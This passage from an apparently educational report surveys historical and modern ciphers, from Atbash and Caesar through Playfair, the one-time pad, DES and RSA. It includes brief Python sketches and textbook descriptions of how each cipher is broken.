the last, the second letter with the second-to-last, and so on. In the Latin
(Roman) alphabet, “A” is substituted with “Z”,
“B” is substituted with “Y”, and so on. Table 1 (refer to Appendix A) illustrates the
Atbash cipher for the Roman letters A to J.
Since the Atbash cipher is trivially reversible, the original letters can easily be
recovered. The Atbash cipher thus lacks complexity and provides minimal security,
so encrypted messages cannot be expected to maintain their confidentiality.
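As an illustration, the reversal can be sketched in a few lines of Python (a minimal sketch for the Latin alphabet, not the applet featured on the website):

```python
import string

# Map each letter to its mirror image: A<->Z, B<->Y, C<->X, ...
ATBASH = str.maketrans(string.ascii_uppercase, string.ascii_uppercase[::-1])

def atbash(text: str) -> str:
    """Encrypt (and, identically, decrypt) a message with the Atbash cipher."""
    return text.upper().translate(ATBASH)
```

Because the mapping is its own inverse, applying the function twice returns the original message, which illustrates why the cipher is so easily reversed.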
2.2 Caesar cipher
(http://www.freedom316.com/cryptografreaks/caesar.php)
The Caesar cipher is a monoalphabetic substitution cipher. Because there are
only 25 possible shifts for the substitution of each encrypted letter, it is
often perceived to be one of the simplest, albeit most renowned, encryption
techniques.
In 50 B.C, Julius Caesar was the first to utilize the Caesar cipher to ensure message
confidentiality in military and government communications among generals and
officials.
As seen in Table 2 (refer to Appendix A), each letter in the plaintext is substituted
with the letter a fixed number of positions further down the alphabet. For example,
with a shift of 3, the letter “A” would be substituted by “D”, “B” by “E”,
and so on.
Like the Atbash cipher, the Caesar cipher is easily reversible, and the
original letters can be recovered simply by reversing the shift. Since the Caesar cipher
lacks complexity, it offers negligible communication security and message
confidentiality. However, in the ancient era the Caesar cipher was deemed
relatively secure, because many of Julius Caesar’s unintended recipients were illiterate,
and even those who were literate might have assumed the cipher-texts were
written in an unidentified language. Nevertheless, Julius Caesar did attempt to
strengthen his encryption technique by substituting Greek letters for Latin letters, so as
to enhance communication security and message confidentiality.
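The shift operation can be sketched as follows (a minimal illustration over the 26-letter Latin alphabet; decryption is simply a shift in the opposite direction):

```python
import string

def caesar(text: str, shift: int) -> str:
    """Substitute each letter with the one `shift` positions down the alphabet."""
    shift %= 26
    shifted = string.ascii_uppercase[shift:] + string.ascii_uppercase[:shift]
    return text.upper().translate(str.maketrans(string.ascii_uppercase, shifted))
```

For example, `caesar("ABC", 3)` yields `"DEF"`, and `caesar(ciphertext, -3)` undoes a shift of 3, which is why the cipher is trivially reversible once the shift is guessed.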
3
Before World War I Cryptography
In this segment, we will be exploring two cryptography techniques and their features,
specifically the Vigenère cipher and the Jefferson Wheel cipher.
3.1 Vigenère cipher
(http://www.freedom316.com/cryptografreaks/vigenere.php)
The Vigenère cipher is a polyalphabetic substitution cipher. To encrypt a plaintext
message, different Caesar ciphers are applied to the plaintext according to the letters
of a specified key. The key denotes which substitution alphabet will be used
for the encryption of each letter.
19
In 1586, the French cryptographer and diplomat Blaise de Vigenère published his
invention of the text autokey cipher, later known as the Vigenère cipher,
in his book entitled “Traicté des chiffres ou secrètes manières d'escrire”.
In the 19th century, the Vigenère cipher was used to encode messages which are
deemed to be confidential across telegram systems.
The Vigenère cipher is perceived to be more secure than monoalphabetic
ciphers because it can use up to 26 different cipher alphabets to encode a message.
In order to decipher
the plaintext message, the recipient needs to be aware of the Vigenère tableau and the
key used by the sender.
The Vigenère tableau in Figure 1 (refer to Appendix A) consists of a square
matrix in which the 26 letters are written repeatedly in each of the 26 rows,
each row shifted one position to the left of the previous row, as in the Caesar cipher.
If the sender wishes to encrypt the plaintext message “HELLO”, he first decides
on a key. If he decides that the key is “HEY”, he repeats the letters of the
key until its length matches the length of the plaintext message, as shown in
Table 3 (refer to Appendix A).
With the given plaintext and key, the sender can locate each cipher letter within the
Vigenère Table by searching within the row of the key and column of the plaintext.
For example, the first letter of the key is “H”, thus the sender would need to locate the
row belonging to “H” and the column belonging to the plaintext “H”. The resultant
ciphertext is “O”.
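The table lookup is equivalent to adding the key letter and the plaintext letter modulo 26 (with A = 0, …, Z = 25), which the following sketch uses to reproduce the example above:

```python
def vigenere_encrypt(plaintext: str, key: str) -> str:
    """Add each (repeated) key letter to the plaintext letter, modulo 26."""
    out = []
    for i, p in enumerate(plaintext.upper()):
        k = key.upper()[i % len(key)]
        out.append(chr((ord(p) + ord(k) - 2 * ord("A")) % 26 + ord("A")))
    return "".join(out)

print(vigenere_encrypt("HELLO", "HEY"))  # -> OIJSS
```

As in the worked example, the first plaintext letter “H” combined with the first key letter “H” yields the cipher letter “O”.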
Similarly, the Vigenère cipher can be depicted using cipher discs, where the keyword
specified by the sender determines the number of rotational shifts which
the inner disc has to perform.
Even though the Vigenère Cipher is perceived to be more secure and trusted, the
cipher-texts can still be decoded. For many years in the 19th century, the Vigenère
cipher was deemed to be “le chiffre indechiffrable” – “the unbreakable cipher”. This
is mainly because it conceals plaintext letter frequencies, which simpler ciphers
expose directly. For instance, in the English language E is often deemed the
most frequently used letter, so if one cipher-text letter occurs most often,
one could easily link it to E. With the Vigenère cipher, however, the most-used
plaintext letter is encoded using several different cipher-text letters, which
increases the difficulty of decoding the plaintext message via frequency analysis.
In later years, however, the Vigenère cipher could be deciphered using brute force
and mathematical methods. This is because the cipher repeats the letters of the
key until the key is as long as the plaintext. Via the Kasiski test, invented in
1861 by a German army officer and cryptanalyst, Friedrich W. Kasiski, identical
pairings of plaintext segments with the same key letters generate identical
cipher-text segments, and such repetitions can be used to recover the plaintext
and, at the same time, break the Vigenère cipher. If the cryptanalyst can identify
the correct key length, via either the Kasiski or the Friedman test, the
cipher-text can be easily deciphered.
20
3.2 Jefferson’s Wheel Cipher
(http://www.freedom316.com/cryptografreaks/jefferson.php)
The Jefferson’s Wheel Cipher is a polyalphabetic cipher system consisting of a set of
wheels and an axle.
Before becoming the third president of the United States, Thomas Jefferson, then the
American ambassador to France, invented the Jefferson Wheel cipher in 1795 to ensure
that messages sent to the US were secure and confidential. The cipher was not made
known to the US Army until 1922, when Major Joseph Oswald Mauborgne of the
US Army Signal Corps built on the idea and produced the M-94
cryptographic equipment. The M-94 then remained the main cipher used in
battlefields until 1942.
The Jefferson Wheel cipher uses 36 wheels, each with the 26 letters of
the Latin alphabet wrapped around it in a random order. Each wheel is
numbered uniquely, and the order of the wheels around the axle is a significant aspect of this
cipher system. A code word created by the user determines the ordering of the
wheels, and different wheel orders result in different ciphers. Once the order is
set, the user rotates the wheels (i.e. up and down) until the entire message is
spelled out along one row. For instance, to encrypt the sentence “You are
beautiful”, the letter “y” is placed on the leftmost wheel. The next wheel is
rotated until the letter “o” is next to “y”, and the third wheel until “u” is next to
“o”. This is repeated until the message, written with no spaces or punctuation
marks, is spelled out across the 36 wheels. Each of the remaining rows then holds
either one of the possible cipher-texts or the plaintext message itself. The user
copies one row of cipher-text letters, any row other than the one containing the
original message, and sends it to the recipient. Upon receiving the cipher-text,
the recipient arranges his own identical set of discs so that the cipher-text is
spelled out along one row, and then scans the other rows for the one that reads
sensibly. It is highly unlikely that more than one row reads as sensible English,
since the sender can check for and avoid such a coincidence; usually only the
plaintext row is readable, so the recipient can spot the message easily. For
messages containing more than 36 letters, the user repeats the entire process,
chunk by chunk, until the full cipher-text is obtained.
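A simplified software model of the wheel cipher can be sketched as follows (an illustrative sketch: both parties are assumed to share identically ordered wheels, and the chosen cipher row is expressed as a fixed offset, whereas the physical device lets the sender pick any of the 25 other rows):

```python
import random

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def make_wheels(n: int, seed: int = 1795) -> list[str]:
    """Each wheel carries the 26 letters in a random order; both parties
    must hold identical wheels arranged in the same secret order."""
    rng = random.Random(seed)
    wheels = []
    for _ in range(n):
        letters = list(ALPHABET)
        rng.shuffle(letters)
        wheels.append("".join(letters))
    return wheels

def encrypt(message: str, wheels: list[str], offset: int) -> str:
    """Spell the message along one row, then read the row `offset` below it."""
    return "".join(w[(w.index(c) + offset) % 26]
                   for c, w in zip(message.upper(), wheels))

def decrypt(cipher: str, wheels: list[str], offset: int) -> str:
    """Rotating 26 - offset positions further returns to the original row."""
    return encrypt(cipher, wheels, 26 - offset)
```

A message chunk may be at most as long as the number of wheels, which is why longer messages must be processed chunk by chunk.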
If the message to be encrypted is short, and the order of the letters on the wheels
and of the wheels themselves is unknown, the Jefferson Wheel cipher is reasonably
secure even against modern code-cracking techniques. The same applies when more
than one row of text is encrypted with disks in the same order. If the length of
the message increases substantially, however, an attacker can use the letter
frequencies of the English language to search for patterns and decipher the message.
One of the limitations of this cipher system is that the user has to send
copies of the cipher device to his or her recipients beforehand. In that era,
this physical delivery would be extremely time-consuming, taking months to
fulfil; by then, the message to be transmitted could well have become useless
and inaccurate.
4
War Cryptography
In this segment, we will be exploring three cryptography techniques and their features,
specifically the Playfair cipher, the One Time Pad and the ADFGVX cipher.
4.1 Playfair Cipher
(http://www.freedom316.com/cryptografreaks/playfair.php)
The Playfair cipher is the earliest digraph substitution cipher. It encrypts pairs of
letters instead of single letters, as in the Caesar cipher. It uses a table
in which 25 letters of the English alphabet are arranged in a 5x5 grid.
Typically, “J” is removed from the table and its adjacent letter, “I”, substitutes
for it when a plaintext message is encoded.
The Playfair cipher was known to be more secure than the above-mentioned
ciphers because it cannot be deciphered using the frequency-analysis method
normally used against single-substitution ciphers. To identify a Playfair cipher,
one would note that the cipher-text contains no double-letter digraphs and that
the message is reasonably long.
In 1854, this manual symmetric cipher was first introduced by the scientist Charles
Wheatstone. At the time he was in charge of developing the electric telegraph
system in England, and he was also seeking a method to communicate
securely with his friends. He therefore devised a cipher that could be
encoded and solved manually, without bulky or pricey equipment.
The name “Playfair”, however, derives from Lord Lyon Playfair, a
renowned friend of Charles Wheatstone, who strongly supported the cipher and
promoted its use within the British Army. As a result, it was used by the British
Army in World War I and the Australians in World War II to conceal significant,
albeit non-crucial, communications and secrets from their enemies during the
warfare. Even if the enemies got hold of the concealed messages, they could not
decode them promptly, owing to the increased difficulty of breaking the cipher;
by the time a message could be decoded, it would no longer be useful, timely
or accurate.
To encode a plaintext message, the sender breaks it into groups of two letters
and locates each pair within the key table; the two letters of a digraph
generally mark opposite corners of a rectangle in the key
table.
The following rules need to be adhered to during encoding.
Firstly, when both letters of a digraph are identical, the second occurrence
is replaced by “X”. Secondly, if the letters of a digraph lie in the same row,
each is substituted with the letter directly to its right. Thirdly, if the
letters lie in the same column, each is substituted with the letter directly
below it. Lastly, if the letters lie in neither the same row nor the same
column, each is replaced with the letter in its own row but in the column of
the other letter, i.e. the opposite corner of the rectangle they form.
22
The sender must preserve the order: the first letter of the encrypted pair is
taken from the row of the first letter of the plaintext pair.
Moreover, the plaintext message must contain an even number of letters. If it
contains an odd number of letters, the last letter is paired with “X”.
For instance, the plaintext message “HELLO EVERYBODY”, which has a
repeated letter in the group “LL” and an odd number of letters, is
grouped as “HE LX LO EV ER YB OD YX”. Subsequently, the
sender would need to observe the letter pairs and their positions within the grid.
If “playfair example” is used as the key, Figure 2 (Refer to Appendix A) would be
the table grid.
If the plaintext message is, “Hide the golds”, upon breaking up into groups of 2
letters, it will look like the digraph letters in Table 4 (Refer to Appendix A).
The pair “HI” lies in neither the same row nor the same column, so the sender
replaces each letter with the one at the opposite corner of their rectangle. As
a result, “HI” becomes “BM”.
The second pair, “DE”, lies within the same column. The sender replaces
each letter with the letter directly below it. As a result,
“DE” becomes “OD”.
The third pair, “TH”, again lies in neither the same row nor column, and
becomes “ZB” by the rectangle rule.
Applying the same rules, the fourth pair “EG” becomes “XD”, the fifth pair
“OL” becomes “NA”, and the sixth pair “DS” becomes “HO”.
In summary, “HI DE TH EG OL DS” becomes “BM OD ZB XD NA HO”.
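The digraph rules above can be sketched in code; the following minimal sketch (encryption only, for brevity) reproduces the worked example with the key “playfair example”:

```python
def build_grid(key: str) -> str:
    """Build the 5x5 key square as a 25-character string, row by row:
    key letters first (J merged into I), then the remaining letters."""
    grid = []
    for ch in key.upper().replace("J", "I") + "ABCDEFGHIKLMNOPQRSTUVWXYZ":
        if ch.isalpha() and ch not in grid:
            grid.append(ch)
    return "".join(grid)

def encrypt_pair(grid: str, a: str, b: str) -> str:
    """Encrypt one digraph using the row/column/rectangle rules."""
    ra, ca = divmod(grid.index(a), 5)
    rb, cb = divmod(grid.index(b), 5)
    if ra == rb:                                  # same row: letters to the right
        return grid[ra * 5 + (ca + 1) % 5] + grid[rb * 5 + (cb + 1) % 5]
    if ca == cb:                                  # same column: letters below
        return grid[((ra + 1) % 5) * 5 + ca] + grid[((rb + 1) % 5) * 5 + cb]
    return grid[ra * 5 + cb] + grid[rb * 5 + ca]  # rectangle: swap the columns

grid = build_grid("playfair example")
pairs = ["HI", "DE", "TH", "EG", "OL", "DS"]
print(" ".join(encrypt_pair(grid, a, b) for a, b in pairs))  # -> BM OD ZB XD NA HO
```

Decryption uses the same grid with the inverse rules (letters to the left, letters above, and the same rectangle swap).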
In order to decipher, if letters within the same cipher-text digraph are located
within the same row, substitute the letter with the one directly on the left. If letters
within the same cipher-text digraph are located within the same column, substitute
with the one directly on top.
The Playfair cipher can still be broken given a sufficient amount of text. If
only the cipher-text is known, without the key or the plaintext, a brute-force
attack on the cipher can exploit the frequency of occurrence of the digraphs.
Frequency analysis remains possible, but it must contend with roughly 600
possible digraphs instead of only 26 single letters, so the technique is
practical only when there is a large amount of cipher-text to work on.
Another way to decipher the Playfair cipher is to examine its digraphs carefully
to determine whether any reversed digraphs exist within a cipher-text. For
instance, the cipher-text pairs “AB” and “BA” decrypt to reversed plaintext
pairs such as “RE” and “ER”. Words like “Receiver” and “Departed” both start
and end with such reversed letter pairs. In this scenario, one identifies and
matches the reversed cipher-text pairs against a list of words starting and
ending with “RE” and “ER” respectively, determines the correct plaintext, and
from it recovers the key.
To make the encryption more secure, the German Army, Air Force and Police
used the Double Playfair encryption technique during World War II. However,
Double Playfair did not prove to be a foolproof method either, and it too was
eventually broken.
4.2 One Time Pad
(http://www.freedom316.com/cryptografreaks/onetimepad.php)
The One Time Pad is a cryptography system also often referred to as the
Vernam cipher or the perfect cipher. It is the sole cryptography technique
that is mathematically unbreakable, provided it is used correctly. It is often
used for diplomatic and military purposes by intelligence agencies to ensure the
confidentiality of messages transmitted; it was used extensively during World
War II and throughout the Cold War period. The One Time Pad is known to be the
only cryptography system which provides bona fide message security in the long run.
In order for the One Time Pad to be unbreakable and secure, the rules stated in
Table 5 (refer to Appendix A) must be followed by the message
sender.
In 1882, Californian banker Frank Miller invented the One Time Pad and
published it in his self-written codebook entitled, “Telegraphic Code to Insure Privacy
and Secrecy in the Transmission of Telegrams”.
In 1917, Gilbert Vernam, a research engineer at AT&T, devised an automated
electro-mechanical system to encrypt messages transmitted via teletypewriter
communications. The One-Time Tape he invented implemented a polyalphabetic
cipher using a non-repeating random sequence of characters. The machine was
offered to the government for use during World War I, but it did not go on sale
in the commercial market until 1920, when AT&T promoted the Vernam system and
highlighted its secure communication function; the response garnered, however,
was unsatisfactory, and the one-time tapes were instead used mainly by
headquarters and communication centres. The system was put to extensive use
only during World War II.
When a truly random key is applied to a plaintext, the cipher-text derived is
also random. Given only the cipher-text, a third party or unintended message
recipient cannot solve for the message, because he has no clue of either the key
or the plaintext. In addition, since each digit or letter within the key is
random, the unintended recipient is unable to observe any mathematical link
between cipher-text characters. Addition modulo 10 (for one-time-pad digits) or
modulo 26 (for one-time-pad letters) is used to ensure that the cipher-text
discloses neither the key nor the plaintext message.
Even with infinite computational power to search through all possible keys, an
adversary would still be unable to determine which key is the correct one. Thus,
the one-time pad is completely secure in this information-theoretic sense.
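In modern terms the pad is usually described as a bitwise XOR of the message with a random key of the same length, which the following sketch illustrates:

```python
import secrets

def otp_encrypt(plaintext: bytes) -> tuple[bytes, bytes]:
    """Draw a fresh, truly random key as long as the message and XOR them.
    The key must be used exactly once and then destroyed."""
    key = secrets.token_bytes(len(plaintext))
    cipher = bytes(p ^ k for p, k in zip(plaintext, key))
    return cipher, key

def otp_decrypt(cipher: bytes, key: bytes) -> bytes:
    """XOR-ing with the same key a second time recovers the plaintext."""
    return bytes(c ^ k for c, k in zip(cipher, key))
```

Note that `secrets` provides a cryptographically strong random source; using an ordinary pseudo-random generator would violate the randomness requirement on which the security proof rests.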
A truly random key is crucial in enabling the one-time pad to be
mathematically unbreakable. Besides being random, the key must never be used
more than once; otherwise it can be recovered via simple cryptanalysis. Using
the same key twice exposes the relationship between the two cipher-texts
produced under that key: the combined cipher-texts are no longer random, the
plaintext messages can be discovered via heuristic analysis, and known-plaintext
attacks can reveal the key itself. The adversary then risks discovering the
contents of all the encrypted messages belonging to the same key.
Furthermore, the one-time pad lacks message authentication. Because encryption
is a simple XOR of the key and the plaintext, an adversary who knows the
plaintext can tarnish the integrity of the message by substituting another
message of the same length, without ever accessing the one-time pad directly.
Such malicious modification can be prevented by combining the one-time pad with
a message authentication code, for example one based on universal hashing, to
uphold message integrity.
4.3
ADFGVX cipher
(http://www.freedom316.com/cryptografreaks/adfgvx.php)
The ADFGVX cipher is a fractionating transposition cipher. It was derived from
the ADFGX cipher, an earlier, similar cipher invented by Colonel Fritz Nebel in
1918. The letter “V” was added to the name so that the entire alphabet plus the
ten digits could be positioned in a 6x6 Polybius square; as a result,
substituting “I” for “J” is no longer necessary. The individual letters A, D, F,
G, V and X sound extremely different when converted into Morse code; the name of
the cipher, “ADFGVX”, reflects this choice, made to minimize errors during
encoding and transmission.
The ADFGVX cipher was introduced and used by the German Army in World
War I to conceal communications from unintended recipients.
This cipher uses a key – a 6x6 Polybius square grid which contains 26 letters in the
entire English alphabet and digits from 0 to 9 as shown in Figure 3 (Refer to
Appendix A).
All cells of the grid are occupied by a letter or digit, arranged randomly by
permutation. During encryption, each character of the plaintext is first
substituted with the row and column labels of its cell in the key square.
Following that, the text undergoes fractionating columnar transposition: it is
written row by row into a grid whose number of columns equals the length of a
transposition keyword, one character per cell; the columns are then re-ordered
by sorting the keyword’s letters into alphabetical order; and lastly, the
cipher-text is derived by reading off the columns in this new order.
For example, the plaintext message “Attack at 1800” yields the following
intermediate text after substitution: “DF DG DG DF AD GG DF DG DX XF PG PG”.
Re-ordering the columns via permutation gives the arrangement in Figure 4
(refer to Appendix A), and the final cipher-text obtained via fractionating and
columnar transposition is illustrated in Figure 5 (refer to Appendix A).
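The two stages, Polybius substitution followed by keyword-ordered columnar transposition, can be sketched as follows. The 6x6 square and the keyword below are illustrative stand-ins, since the real square and keyword were shared secrets (and the square in Appendix A may differ):

```python
LABELS = "ADFGVX"
# A sample 6x6 Polybius square (36 cells: 26 letters + 10 digits), written
# row by row; the actual square is part of the secret key.
SQUARE = "PH0QG64MEA1YL2NOFDXKR3CVS5ZW7BJ9UTI8"

def substitute(plaintext: str) -> str:
    """Stage 1: replace each character by its row and column labels."""
    out = []
    for ch in plaintext.upper():
        if ch in SQUARE:
            r, c = divmod(SQUARE.index(ch), 6)
            out.append(LABELS[r] + LABELS[c])
    return "".join(out)

def transpose(text: str, keyword: str) -> str:
    """Stage 2: write the text row by row under the keyword, then read the
    columns in alphabetical order of the keyword's letters."""
    n = len(keyword)
    order = sorted(range(n), key=lambda i: keyword[i])
    return "".join(text[i::n] for i in order)

cipher = transpose(substitute("ATTACK AT 1800"), "GERMAN")
```

The fractionation is what makes the transposition effective: because each plaintext character is split into two labels, the column shuffle separates the halves of each character.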
Later in the same year, the cipher was broken by Georges Painvin, a French Army
lieutenant, using complex algorithms. In today’s context, the ADFGVX cipher is
deemed relatively insecure because it can be cryptanalysed, especially if the
length of the keyword is known and the unintended recipient is able to rearrange
the columns into their correct order; together with brute-force and
trial-and-error techniques, the recipient might then be able to decode the
cipher. To enhance the security of the cipher, the sender can apply other
ciphers to the plaintext message, so that the level of difficulty in decoding
the cipher increases significantly.
5
Modern Cryptography
In this segment, we will be exploring cryptography techniques and their respective
features used in the modern context, specifically the DES, RSA and the AES.
5.1 Data Encryption Standard (DES)
(http://www.freedom316.com/cryptografreaks/des.php)
The DES is a block cipher, using shared secret encryption among the intended
parties. It was established as a standard by the National Bureau of Standards,
with the involvement of the National Security Agency, in the 1970s. The
implementation of DES was aimed at offering a standard scheme for protecting
and concealing sensitive commercial information and unclassified government
applications from unintended parties. The initial design, named “Lucifer”, was
created by IBM. In 1976, after much redesigning and modification, DES officially
became a federal standard. From then on, DES has been extensively adopted and
published as a standard worldwide.
There has been public debate over the design and the selection of the 56-bit
key. However, later analysis has indicated that the selection was appropriate
and DES was indeed well designed. [14 in Appendix B]
In Figure 6 (refer to Appendix A), the key determines the mechanism of the
process. By applying these operations repeatedly, DES obtains an approximately
random result, and without the key an unintended recipient will not be able to
obtain the original plaintext message.
The fundamental procedure encodes one 64-bit plaintext data block at a time and
iterates 16 times. The block first goes through an initial permutation. The key
is nominally 64 bits, but 8 of those bits are used for parity checking, so every
8th bit of the key is discarded after checking, leaving 56 bits. Inside each
iteration, 48 bits derived from the 56-bit key enter a complex key-dependent
function. This function is the crux of security within DES: it contains numerous
transformations and non-linear substitutions to ensure that the cipher is
non-linear and hard to break. After the XOR and key-dependent function stages, a
final permutation, which is the inverse of the initial permutation, is performed
on the output. The ultimate output of DES is a cipher-text with the same
bit-string length as the original plaintext message input.
At the start of each iteration, the 64-bit block is halved, with the right
32-bit half passing through the Feistel function before being XOR-ed with the
left 32-bit half; the halves then exchange positions, except after the last
iteration. Two essential cryptographic techniques operate within DES, namely
confusion and diffusion: diffusion is achieved through the permutations, while
confusion is introduced by the non-linear substitutions.
The Feistel function processes 32 bits at a time and consists of four phases.
Firstly, in the expansion phase, the 32-bit block is lengthened to 48 bits via
the expansion permutation, which duplicates half of the initial 32 bits: the
output consists of eight 6-bit blocks, each containing a copy of 4
corresponding input bits plus the adjacent bit from each neighbouring 4-bit
group. Secondly, in the key-mixing phase, the output of the expansion phase is
combined with a sub-key via an XOR operation; sixteen 48-bit sub-keys, one per
round, are derived from the main key. Thirdly, after key mixing, the block is
divided into eight 6-bit pieces, which are processed by the substitution boxes:
each of the eight S-boxes maps its six input bits to four output bits via a
non-linear transformation defined by a lookup table. Lastly, in the permutation
phase, the outputs of the eight S-boxes are concatenated into a 32-bit block
that is permuted within the P-box, a straight permutation. The resultant output
is XOR-ed with the left 32-bit half of the block from the start of the round;
with the exception of the final round, the left and right 32-bit halves are then
interchanged and pass through the Feistel function again.
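The overall Feistel structure can be sketched with a toy round function (illustrative only: DES's actual expansion, S-boxes and permutations are omitted, and the round function below is an arbitrary stand-in); decryption is the same procedure with the sub-keys applied in reverse order:

```python
MASK32 = 0xFFFFFFFF

def toy_round_fn(half: int, subkey: int) -> int:
    """A stand-in for DES's expansion/S-box/P-box function (not the real one)."""
    return ((half * 0x9E3779B9) ^ subkey) & MASK32

def feistel_encrypt(block: int, subkeys: list[int]) -> int:
    """Each round sets (L, R) <- (R, L XOR f(R, k)); the swap after the
    final round is undone, as in DES."""
    left, right = block >> 32, block & MASK32
    for k in subkeys:
        left, right = right, left ^ toy_round_fn(right, k)
    return (right << 32) | left

def feistel_decrypt(block: int, subkeys: list[int]) -> int:
    """The Feistel structure is its own inverse under reversed sub-keys."""
    return feistel_encrypt(block, subkeys[::-1])
```

A notable property of this structure is that the round function never needs to be inverted, which is why DES's round function can be as complex and non-linear as desired.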
Since DES utilizes a key to operate its encryption mechanism, only those who
know the particular key used can decrypt the cipher-text. However, DES is no
longer secure: because the 56-bit key is extremely short, DES is susceptible to
brute-force attack via exhaustive search of the key space using specialized
machines and hardware. In 1998, the Electronic Frontier Foundation developed a
DES-cracking machine that was able to locate a DES key within a couple of days.
Any corporation, government agency or malicious organization could easily
purchase such a machine to decipher a DES cipher-text.
However, another encryption technique, Triple DES, has enhanced security
characteristics because DES is applied three times using three different keys.
It is much more secure because a brute-force key search becomes computationally
infeasible. The minor disadvantage of Triple DES is that it runs at roughly
one-third of the speed of DES, although modern CPUs are able to run it at a
decent speed.
5.2 Rivest, Shamir, Adleman (RSA)
(http://www.freedom316.com/cryptografreaks/rsa.php)
The RSA encryption system uses a public key cryptography technique to provide and
maintain privacy, confidentiality and authenticity of digital data. Examples of such
uses include those in electronic commerce protocols, web servers and browsers which
elicit web traffic, electronic communications such as e-mails, remote logging-in
sessions and credit card payment verification systems. [16 in Appendix B]
RSA was invented by Ron Rivest, Adi Shamir and Leonard Adleman, and the first
publication about RSA appeared in August 1977 in Scientific American. The name
RSA represents the initials of the three inventors' surnames, in the order listed in the
published paper. Following that, in 1978, the RSA algorithm was made available in
print in the Communications of the ACM.
With regards to the RSA algorithm, the generation of large prime numbers is crucial.
This is mainly because the security of the RSA public key encryption technique
depends largely on the computational difficulty of finding the complete factorization
of a large composite integer whose prime factors are unknown.
The RSA algorithm consists of four steps, namely creation of the public key,
encryption of messages, creation of the private key, and decryption of messages. The
public key is made known to everyone and is used to encrypt messages, while the
private key is kept secret and used only for decrypting messages.
During the creation of a public key, the key owner (the eventual message recipient)
has to choose two large prime numbers P and Q. For example, suppose the following
values are chosen: P = 23 and Q = 41.
Upon substituting the values of P and Q into equation (1) (refer to Appendix A), X =
880.
E must be chosen relatively prime to X; for example, E = 879.
Similarly, from equation (2) (refer to Appendix A), N = 943.
With the public key being the value of N together with the value of E, the sender is
able to encrypt the message.
As an example, let the message be the value m = 35.
In order to encode and send the message to the recipient, the sender has to calculate
the value of C in equation (3) (refer to Appendix A).
Upon substituting the values of m, E and N, C = 485. The value of C is the encoded
message which the sender sends to the message recipient.
In order to decipher the encoded message, the recipient has to work out the
multiplicative inverse in equation (4) (refer to Appendix A) in order to find the value
of D.
Upon substituting the relevant values, D = 879. (With this particular choice of E, D
happens to equal E, since 879 ≡ -1 mod 880; a different choice of E would yield a
distinct D.)
The value of the private key is the value of N together with the value of D.
In order to decode the message, the recipient must calculate the value of m in
equation (5) (refer to Appendix A).
Substituting equation (3) into equation (5) yields equation (6) (refer to Appendix A).
Based on equation (6), in order to recover the transmitted message, a recipient has to
know the values of D and N. In the above example, both P and Q are relatively small,
so an unintended recipient could still recover the message by brute-force
mathematical methods: factoring N yields P and Q, from which X and hence D can be
computed via equations (1) and (4). If the values of P and Q are very much larger, an
unintended recipient will not be able to compute D this way, because it is
computationally infeasible to find the complete factorization of a large composite
integer whose prime factors are unknown. As a result, the RSA algorithm is
reasonably secure if both P and Q are large, and encrypted messages can continue to
maintain their confidentiality.
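The arithmetic of the worked example can be checked with a short Python script. Note that pow with a negative exponent (available from Python 3.8) computes the modular inverse, and that with E = 879 and X = 880, the inverse D works out to 879, since 879 ≡ -1 mod 880.

```python
# Checking the worked example: P = 23, Q = 41, E = 879 and m = 35.
P, Q = 23, 41
N = P * Q                # equation (2): N = 943
X = (P - 1) * (Q - 1)    # equation (1): X = 880
E = 879                  # chosen relatively prime to X

m = 35
C = pow(m, E, N)         # equation (3): the encoded message

D = pow(E, -1, X)        # equation (4): D*E mod X = 1 (Python 3.8+)
recovered = pow(C, D, N) # equation (5): decryption

assert (D * E) % X == 1
assert recovered == m
```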
Because textbook RSA is a deterministic encryption technique, a malicious,
unintended recipient of a message can conduct a chosen-plaintext attack by
encrypting candidate plaintext messages with the known public key and checking
whether the results match the intercepted cipher-texts. An RSA cryptosystem without
padding is not semantically secure, as such an attacker is able to distinguish two
encrypted messages from each other. Thus, in order to prevent such attacks,
real-world RSA implementations generally insert structured, randomized padding into
the message before encryption. This ensures that the padded message encrypts to a
different cipher-text each time, even when the underlying messages are identical.
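A minimal sketch of why unpadded RSA is vulnerable, using hypothetical toy parameters; the "padding" here is a deliberately naive stand-in for a real scheme such as OAEP:

```python
# Textbook (unpadded) RSA is deterministic: identical plaintexts always
# produce identical cipher-texts. Toy key (hypothetical): N = 61*53.
N, E = 3233, 17

m = 42
c1 = pow(m, E, N)
c2 = pow(m, E, N)
assert c1 == c2      # an eavesdropper can detect repeated messages

def pad(m, nonce):
    # Deliberately naive randomized "padding" (NOT a real scheme like
    # OAEP): prepend a nonce byte so repeats encrypt differently
    return (nonce << 8) | m

c3 = pow(pad(m, 1), E, N)
c4 = pow(pad(m, 2), E, N)
assert c3 != c4      # same message, different cipher-texts
```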
The largest number factored by a factoring algorithm in recent years was 768 bits
long. Since RSA keys are generally 1024 to 2048 bits long, RSA is still considered
unbreakable in practice in today's context.
With regards to the authentication of the message, the sender can make use of RSA
to digitally sign a message.
If the sender wants to sign a digital message before sending it to the intended
recipient, he/she can use his/her private key to create a digital signature. The sender
first computes a hash of the message and then encrypts this hash value with his/her
private key; the result is the digital signature, which is appended to the message.
Upon receiving the digitally signed message, the intended recipient computes the
hash of the message with the identical hash algorithm, decrypts the signature with the
sender's public key, and compares the resulting hash value with the message's actual
hash value. If both hashes are the same, the recipient can be confident that the
message was signed with the sender's private key and that the message has retained
its integrity.
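The hash-then-sign procedure can be sketched as follows, using hypothetical textbook-sized RSA values and SHA-256; real signatures use full-size keys and a padding scheme such as RSA-PSS:

```python
import hashlib

# Hash-then-sign with a textbook-sized toy RSA key (hypothetical values;
# D*E = 1 mod (61-1)*(53-1)). Real keys are 2048 bits or more.
N, E, D = 3233, 17, 2753

def sign(message: bytes) -> int:
    # Hash the message, then "encrypt" the digest with the private key
    h = int.from_bytes(hashlib.sha256(message).digest(), 'big') % N
    return pow(h, D, N)

def verify(message: bytes, signature: int) -> bool:
    # Recompute the hash; "decrypt" the signature with the public key
    h = int.from_bytes(hashlib.sha256(message).digest(), 'big') % N
    return pow(signature, E, N) == h

sig = sign(b"pay Bob $10")
assert verify(b"pay Bob $10", sig)
# A modified message will (almost certainly) fail verification.
```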
Digital signature schemes like RSA-PSS (Probabilistic Signature Scheme) should be
used when creating digital signatures so as to enhance security assurance. In addition,
the sender should also note that the same key should not be used for both encryption
and the creation of digital signatures.
5.3 Advanced Encryption Standard (AES)
(http://www.freedom316.com/cryptografreaks/aes.php)
The AES is an iterative, symmetric block cipher which is used to encrypt and decrypt
electronic data using the same key. Upon encryption, its output has the same number
